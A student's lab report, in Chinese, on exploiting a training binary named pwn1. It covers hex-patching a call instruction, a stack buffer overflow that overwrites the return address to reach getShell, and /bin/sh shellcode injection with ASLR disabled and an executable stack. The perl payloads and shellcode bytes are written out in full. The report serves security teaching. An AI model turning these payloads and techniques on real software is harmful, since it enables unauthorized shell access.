目录


实验目标

  • 本次实验的对象是一个名为pwn1的linux可执行文件。
  • 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。
  • 该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段,然后学习如何注入运行任何Shellcode

返回目录


实验内容

返回目录


知识点描述

  1. 掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码
  • 使用objdump -d 20165330zyx可查看可执行文件20165330zyx的反汇编代码及其对应机器码

  • 可知:
    • NOP:无作用,英文"no operation"的简写,意思是"do nothing"(机器码90)
    • JNE:若不相等则跳(机器码75
    • JE:若相等则跳(机器码74
    • JMP:无条件转移指令。段内直接短转Jmp short(机器码:EB),段内直接近转移Jmp near(机器码:E9),段内间接转移Jmp word(机器码:FF),段间直接(远)转移Jmp far(机器码:EA)
    • CMP:比较指令,cmp的功能相当于减法指令。它不保存结果,只是影响相应的标志位(机器码39)
  1. 掌握反汇编与十六进制编程器
  • 反汇编指令:objdump -d objfile,关于其他用法可参考Linux下C程序的反汇编
  • 关于管道,输入、输出重定向参考linux下输入输出重定向和管道符
  • 十六进制编程器:用来以16进制视图进行文本编辑的编辑工具软件,其实我们只需要用各系统都兼容的vim编辑器就可以实现十六进制编辑的功能。具体步骤如下:
    • 输入命令vi 20165330zyx查看可执行文件内容,发现大部分是我们没法理解的乱码;
    • esc后在底行输入:%!xxd将显示模式切换为16进制模式;
    • 进行相关操作后,输入:%!xxd -r转换16进制为原格式。
  1. 能正确修改机器指令改变程序执行流程

见实验步骤1

  1. 能正确构造payload进行bof攻击

见实验步骤3

返回目录


实验步骤

手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数

  • objdump -d 20165330zyx指令查看可执行文件的反汇编结果
  • 锁定修改目标80484b5: e8 d7 ff ff ff call 8048491 <foo>
  • 对比getShell函数的地址0804847dfoo函数的地址08048491,可以发现两地址之差为十六进制14;

  • call汇编指令的机器码为e8,我们可以锁定这部分,后面的d7 ff ff ff这四个字节为数值部分,代表指令跳转时需要与eip寄存器相加的偏移量
  • 如果我们想让函数调用getShell,只需要修改d7 ff ff ff即可。由于数值存储方式为小端方式,所以锁定需要改的字节为d7,将它与地址差14做减法运算后的值为c3
  • 下面修改可执行文件,将其中的call指令的目标地址由d7ffffff变为c3ffffff
    • cp 20165330zyx 20165330pwn2复制文件
    • 使用vi 20165330pwn2编辑可执行文件;
    • esc后,输入%!xxd将显示模式切换为十六进制模式
    • 在底行/d7查找需要修改的内容,将d7改为c3
    • 转换16进制为原格式::%!xxd -r
    • 保存退出::wq
  • 此时我们反汇编可看到call指令调用的函数被改

  • 输入./20165330pwn2运行该可执行文件

利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数

  • 可执行文件正常运行是调用foo函数,我们发现这个函数有Buffer overflow漏洞
  • foo函数读入字符串,但系统只预留了32字节的缓冲区,超出部分会造成溢出,我们的目标是覆盖返回地址
  • 正常时call调用foo,同时在堆栈上压上返回地址值0x80484ba
  • 确认输入字符串哪几个字符会覆盖到返回地址
  • gdb 20165330pwn(pwn的副本)调试程序,输入有规律的字符串如1111111122222222333333334444444412345678,发生段错误产生溢出

  • info r查看寄存器eip的值,发现输入的1234被覆盖到堆栈上的返回地址

  • 这是我们就将getShell的地址0x0804847d把1234替换即可
  • 由于数据按小端存储,我们的正确输入为11111111222222223333333344444444\x7d\x84\x04\x08
  • 因为我们没法通过键盘输入\x7d\x84\x04\x08这样的16进制值,输入perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input生成包括字符串的一个文件(\x0a表示回车)
  • 使用16进制查看指令xxd查看input文件的内容是否如预期
  • 确认无误后用(cat input;cat) | ./20165330pwn将input中的字符串作为可执行文件的输入

注入一个自己制作的shellcode并运行这段shellcode

  • 下载execstack程序以便接下来可以设置易于攻击的环境:apt-get install execstack
  • 准备工作
    • 修改些设置
       execstack -s pwn1    //设置堆栈可执行
      execstack -q pwn1 //查询文件的堆栈是否可执行
    • 查看地址随机化的状态:more /proc/sys/kernel/randomize_va_space
    • 关闭地址随机化:echo "0" > /proc/sys/kernel/randomize_va_space
  • 构造要注入的payload
    • 目的:将shellcode代码写入buffer(缓冲区足够大),或把shellcode放在返回地址后(缓冲区小),把返回地址改为buffer的首地址
    • 我们选择retaddr+nops+shellcode结构来攻击buf,在shellcode前填充nop的机器码90:
       perl -e 'print "A" x 32;print "\x4\x3\x2\x1\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode
      //上面的\x4\x3\x2\x1将覆盖到堆栈上的返回地址的位置。我们得把它改为这段shellcode的地址。
      //特别提醒:最后一个字符千万不能是\x0a
    • 注入:(cat input_shellcode;cat) | ./20165330pwn
    • 再打开一个终端查看执行文件进程号ps -ef | grep 20165330pwn

    • 启用gdb调试进程,attach 2222与进程建立连接
    • 设置断点查看注入buf的内存地址
       disassemble foo //反汇编
      break *0x080484ae //设置断点
      //在另外一个终端中按下回车
    • c继续
    • info r esp查看esp栈顶指针的地址
    • 使用x/16x 0xffffd33c查看其存放内容,看到01020304,就是返回地址的位置。根据我们构造的input_shellcode可知,shellcode就在其后,所以地址是 0xffffd340,即0xffffd33c加上4字节

    • c-quit退出gdb调试,回到之前的终端输入exit退出命令,修改之前的\x4\x3\x2\x1部分:perl -e 'print "A" x 32;print"\x40\xd3\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode
    • 再次运行(cat input_shellcode;cat) | ./20165330pwn后发现执行成功

返回目录


实验过程中遇到的问题

  • 在实验过程中虚拟机连接网络失败,试了之前所有方法都没效果

解决办法:参考如何解决VMware Workstation虚拟机无法上网,重置网络设置之后重启虚拟机即可连接网络。

  • 在运行pwn1时出现错误提示:[ bash: ./pwn1:没有那个文件或目录],但ls命令下又能看到存在pwn1文件

解决办法:参考64位Kali无法顺利执行pwn1问题的解决方案,一般可解决。

  • 在对上一个问题进行解决时,按照方法却出现了错误提示kali无法安全地用该源进行更新,所以默认禁用该源,kali无法更新源

解决办法:参考解决kali更新源时出现签名无效问题,我将更新源换成该博客中的内容后在进行apt-get update更新成功,之后输入apt-get install lib32z132位运行库安装成功,文件可执行

  • 下载execstack程序时,出现错误提示

解决办法:参考解决 无法获得锁 /var/lib/dpkg/lock - open (11: 资源暂时不可用)


实验感想

  • 实验收获与感想

在这次实验中不仅懂得了什么是缓冲区溢出,也动手实现了缓冲区溢出,并且也把上学期所学的一些内容又串联在了一起,加深了我对堆栈的理解。

  • 什么是漏洞?漏洞有什么危害?
  • 缓冲区溢出就是输入的内容超过所分配的缓冲区空间,被溢出的内容由于设计的缺陷没有被立刻检查到,而破坏堆栈覆盖一些原始数据。
  • 会导致程序运行失败、系统关机、重新启动,或者执行攻击者的指令,比如非法提升权限。

2018-2019-2 20165330《网络对抗技术》Exp1 PC平台逆向破解的更多相关文章

  1. 20155324《网络对抗》Exp1 PC平台逆向破解(5)M

    20155324<网络对抗>Exp1 PC平台逆向破解(5)M 实验目标 本次实践的对象是一个名为~pwn1~的~linux~可执行文件. 该程序正常执行流程是:~main~调用~foo~ ...

  2. 20155232《网络对抗》 Exp1 PC平台逆向破解(5)M

    20155232<网络对抗> Exp1 PC平台逆向破解(5)M 实验内容 (1).掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码(1分) (2)掌握反汇编与十六进制编程 ...

  3. 20155227《网络对抗》Exp1 PC平台逆向破解(5)M

    20155227<网络对抗>Exp1 PC平台逆向破解(5)M 实验目标 本次实践的对象是一个名为pwn1的linux可执行文件. 该程序正常执行流程是:main调用foo函数,foo函数 ...

  4. 2018-2019-2 20165236郭金涛《网络对抗》Exp1 PC平台逆向破解

    2018-2019-2 20165236郭金涛<网络对抗>Exp1 PC平台逆向破解 一.实验内容 1.掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码(0.5分) 2.掌 ...

  5. 20155208徐子涵 《网络对抗》Exp1 PC平台逆向破解

    20155208徐子涵 <网络对抗>Exp1 PC平台逆向破解 实践目标 本次实践的对象是一个名为pwn1的linux可执行文件. 该程序正常执行流程是:main调用foo函数,foo函数 ...

  6. 20145325张梓靖 《网络对抗技术》 PC平台逆向破解

    20145325张梓靖 <网络对抗技术> PC平台逆向破解 学习任务 shellcode注入:shellcode实际是一段代码,但却作为数据发送给受攻击服务器,将代码存储到对方的堆栈中,并 ...

  7. # 《网络对抗》Exp1 PC平台逆向破解20155337祁家伟

    <网络对抗>Exp1 PC平台逆向破解20155337祁家伟 实践目标 本次实践的对象是一个名为pwn1的linux可执行文件. 该程序正常执行流程是:main调用foo函数,foo函数会 ...

  8. 20145206邹京儒《网络对抗技术》 PC平台逆向破解

    20145206邹京儒<网络对抗技术> PC平台逆向破解 注入shellcode并执行 一.准备一段shellcode 二.设置环境 具体在终端中输入如下: apt-cache searc ...

  9. 20145331魏澍琛 《网络对抗技术》 PC平台逆向破解

    20145331魏澍琛 <网络对抗技术> PC平台逆向破解 学习任务 1.shellcode注入:shellcode实际是一段代码,但却作为数据发送给受攻击服务器,将代码存储到对方的堆栈中 ...

  10. 20145336张子扬 《网络对抗技术》 PC平台逆向破解

    #20145336张子扬 <网络对抗技术> PC平台逆向破解 ##Shellcode注入 **基础知识** Shellcode实际是一段代码,但却作为数据发送给受攻击服务器,将代码存储到对 ...

随机推荐

  1. [Bayesian] “我是bayesian我怕谁”系列 - Naive Bayes with Prior

    先明确一些潜规则: 机器学习是个collection or set of models,一切实践性强的模型都会被归纳到这个领域,没有严格的定义,’有用‘可能就是唯一的共性. 机器学习大概分为三个领域: ...

  2. SpringMVC由浅入深day02_1课程安排_2包装类型pojo参数绑定_3集合类型绑定

    springmvc第二天 高级知识 复习: springmvc框架: DispatcherServlet前端控制器:接收request,进行response HandlerMapping处理器映射器: ...

  3. nodejs服务器部署教程四

    nodejs服务器部署最后一篇文章,部署ssl证书,升级http为https,其实网上相关教程有很多,但是略麻烦,本教程让你一切从简,5分钟搞定https,免费一年哦 申请ssl证书 免费申请的机构有 ...

  4. ios开发之--仿(微信)自定义表情键盘

    先附上demo:https://github.com/hgl753951/CusEmoji.git 效果图如下:

  5. Git 学习笔记--Git下的冲突解决

    冲突的产生 很多命令都可能出现冲突,但从根本上来讲,都是merge 和 patch(应用补丁)时产生冲突. 而rebase就是重新设置基准,然后应用补丁的过程,所以也会冲突. git pull会自动m ...

  6. Git 单机版

    Git 是一个分布式的开源版本控制系统,也就是说,每台机器都可以充当控制中心,我从本机拉取代码,再提交代码到本机,不需要依赖网络,各自开发各自的 如何创建 git 仓库: [root@localhos ...

  7. Nginx SSL配置

    一.SSL 原理 ① 客户端( 浏览器 )发送一个 https 请求给服务器② 服务器要有一套证书,其实就是公钥和私钥,这套证书可以自己生成,也可以向组织申请,服务器会把公钥传输给客户端③ 客户端收到 ...

  8. 第7章 Ajax数据爬取

    Ajax 简介 Ajax 分析方法 Ajax 结果提取

  9. Qt Creator build遇到error lnk1158 无法运行rc.exe

    解决办法: 将C:\Program Files (x86)\Windows Kits\10\bin\10.0.15063.0\x64 目录下的rc.exe 和rcdll.dll 复制到 C:\Prog ...

  10. U3D的有限状态机系统

    或许广大程序员之前接触过游戏状态机,这已不是个新鲜的词汇了.其重要性我也不必多说了,但今天我要讲到的一个状态机框架或许您以前并未遇到过.所以,我觉得有必要将自己的心得分享一下.下面是一个链接:http ...